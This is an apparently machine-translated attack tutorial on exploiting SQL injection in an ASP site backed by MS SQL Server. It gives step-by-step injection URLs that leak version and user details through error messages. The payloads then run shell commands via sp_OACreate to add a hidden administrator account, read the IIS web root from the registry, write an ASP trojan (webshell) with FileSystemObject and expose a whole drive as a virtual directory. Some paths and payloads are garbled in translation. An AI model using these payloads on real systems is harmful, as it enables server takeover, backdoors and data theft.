Squeeze the last drop of MS SQL

The network security caused by changing conditions and changes has left people concerned about it. Database, reminds us of the powerful ORACLE, ms SQL. Microsoft has the most vulnerabilities. Today, SQL injection is used to make ms SQL work well for us.

Below (using a well-known website as a test point), I believe that you have mastered SQL database explosion, table explosion, and field explosion. I will not talk about this here.

Ms SQL built-in function Introduction:

@ VERSION get Windows VERSION, ms SQL VERSION, Patch. User_name () Get the connection user Db_name () of the current system get the Connection database HOST_NAME () Get the name of the current host

This information helps us to have a simple understanding of the system.

Okay. Let's get started!

Statement: http://www.xxx.com/list.asp? Classid = 1 return message: Microsoft ole db Provider for SQL Server Error 80040e14 string Order By Id DESC contains unclosed quotation marks. /List. asp, row 290

From the unclosed quotation marks (""), we can determine that SQL INJECTION exists. The vulnerability was discovered, and the above functions were used to work for us:

Statement: http://www.xxx.com/list.asp? Classid = 1 and 0 <> (select @ version)-return: Microsoft ole db Provider for SQL Server Error 80040e07 convert nvarchar value to Microsoft SQL Server 2000-8.00.760 (Intel X86) dec 17 2002 14:22:05 Copyright (c) 1988-2003 Microsoft Corporation Standard Edition on Windows NT 5.0 (Build 2195: Service Pack 4) A syntax error occurs when you convert a column to an int type. /List. asp, row 290

Related information, ms server advanced server 2000 + SP4, SQL 2000 + SP3, from the ms SQL SERVER after 8.00.760 can be seen that the SP3 patch. After reading the server information, you should understand the database permissions:

Statement: http://www.xxx.com/list.asp? Classid = 1 and user_name () = dbo return: normal returned information

It is determined that the permission is DBO. On the surface, the connection user of the DBO permission is often a member of the SYSADMIN server role. This indicates that the database server role member group adds a DBO user to each database by default.

The returned principle is similar to root 1 = 2 .. here is only permission test. Let's take a look at it:

Statement: http://www.xxx.com/list.asp? Classid = 1 and 0 <> (select user_name ()-return: microsoft ole db Provider for SQL Server Error 80040e07 syntax error when converting nvarchar value dbo to a column with the Data Type of int. /List. asp, row 290

This indicates that the database connection user has high permissions and can be determined to be a member of the server role group.

Statement: http://www.xxx.com/list.asp? Classid = 1 and 0 <> (select db_name ()-return: A syntax error occurs when Microsoft ole db Provider for SQL Server Error 80040e07 is used to convert nvarchar value GameIMGSys to a column whose data type is int. /List. asp, row 290

This will expose the current database. To obtain a database connection Member with such high permissions, we certainly want to directly obtain WEBSHELL or nt admin. Nt admin depends on the configuration of the current server. If the configuration of the server is unreasonable, we need to take nt admin directly and use nt admin:

MSSQL internal storage process:

Sp_OACreate (through it, the hazard is greater, but SYSADMINS permission is required to be used) sp_OAGetErrorInfo sp_OAGetProperty sp_OAMethod sp_OASetProperty sp_SetPropertysp_OAStop

Since ms SQL can execute multiple statements at a time, we have the opportunity to use more statements.

Statement: http://www.xxx.com/list.asp? Classid = 1; DECLARE @ shell int exec SP_OACREATE wscript. shell, @ shell output exec SP_OAMETHOD @ shell, run, null, C: winntsystem321_.exe/c net user cntest chinatest/add RETURNS a normal result. (Note: If the shell on the host exists, a cntest user will be created on the server)

After the user is created, add the net localgroup administrators cntest/add statement to the Management Group. If the host of the other party is on port 3389 or IPC, I don't need to talk about the next thing.

What should I do if I only open port 80 for a professional host? Of course, we may still get WEBSHELL and then penetrate it slowly.

Due to high permissions, we may first create a table, write ASP Trojan data, and then use MAKEWEBTASK to obtain WEBSEHLL. the manually written program is too complicated and the biggest problem for uploading webshells is the web directory. Now there are ready-made tools on the Internet to get webshells through BACKUP and MASKWEBTASK tools. We recommend that you obtain the webpage path (read the Registry through the Stored Procedure ):

Use the Stored Procedure xp_regread (to read the registry key value and the permission is public ):

Statement: http://www.xxx.com/list.asp? Classid = 1; create table newtable (id int IDENTITY (1, 1), paths varchar (500) Declare @ test varchar (20) exec master .. xp_regread @ rootkey = HKEY_LOCAL_MACHINE, @ key = SYSTEMCurrentControlSetServicesW3SVCParametersVirtual Roots, @ value_name =/, values = @ test OUTPUT insert into paths (path) values (@ test)

The default IIS path is HKEY_LOCAL_MACHINE SYSTEMCurrentControlSetServicesW3SVCParametersVirtual Roots in the registry.

Use the burst field to read the database value:

Statement: http://www.xxx.com/list.asp? Classid = 1 and 0 <> (select top 1 paths from newtable) -- return: microsoft ole db Provider for ODBC Drivers error 80040e07 [Microsoft] [odbc SQL Server Driver] [SQL Server] convert varchar value E: www ,, 201 A syntax error occurs when you convert a column to an int type.

This indicates that the webpage directory is in E: www, and then you can use FSO to directly write ASP Trojans (prompting that you must have the SYSADMIN permission to use FSO and FSO to open the Trojan ):

Statement: http://www.xxx.com/list.asp? Class = 1; declare % 20 @ o % 20int, % 20 @ f % 20int, % 20 @ t % 20int, % 20 @ ret % 20int % 20 exec % 20sp_oacreate % 20scripting. filesystemobject, % 20 @ o % 20out % 20 exec % 20sp_oamethod % 20 @ o, % 20 createtextfile, % 20 @ f % 20out, % 20e: wwwest. asp, 1% 20 exec % 20 @ ret % 20 = % 20sp_oamethod % 20 @ f, % 20 writeline, % 20 NULL, % 20On Error Resume Next --

Create a test. asp under E: WWW and write the On Error Resume next statement:

Http://www.xxx.com/list.asp? Classid = 1; declare % 20 @ o % 20int, % 20 @ f % 20int, % 20 @ t % 20int, % 20 @ ret % 20int % 20 exec % 20sp_oacreate % 20scripting. filesystemobject, % 20 @ o % 20out % 20 exec % 20sp_oamethod % 20 @ o, % 20 opentextfile, % 20 @ f % 20out, % 20e: wwwest. asp, 8% 20 exec % 20 @ ret % 20 = % 20sp_oamethod % 20 @ f, % 20 writeline, % 20 NULL, % 20asp horse-

Add a record in E: WWWest. asp and record it as asp horse. The entire Trojan may be written in this way. (% Percent signs should be written in place of % 25 ). What should I do if I cannot get the webpage directory? If you want to know whether the website uses the default WEB, or use the domain name as the WEB.

Declare @ o int exec sp_oacreate wscript. shell, @ o out exec sp_oamethod @ o, run, NULL, cscript.exe c: inetpubwwwrootmkwebdir. vbs-w "Default Web site"-v "e", "e :"

Create a virtual directory E Under the default WEB site, pointing to E: disk.

Declare @ o int exec sp_oacreate wscript. shell, @ o out exec sp_oamethod @ o, run, NULL, cscript.exe c: inetpubwwwrootchaccess. vbs-a w3svc/1/ROOT/e + browse

Adding browsing properties to virtual directory e is good. Open a virtual service for yourself. The path to the web page Directory is almost broken. Now, let's get myself started. That's why WEBSHELL's use of ms SQL has come to an end for our work. You should be here for the next job.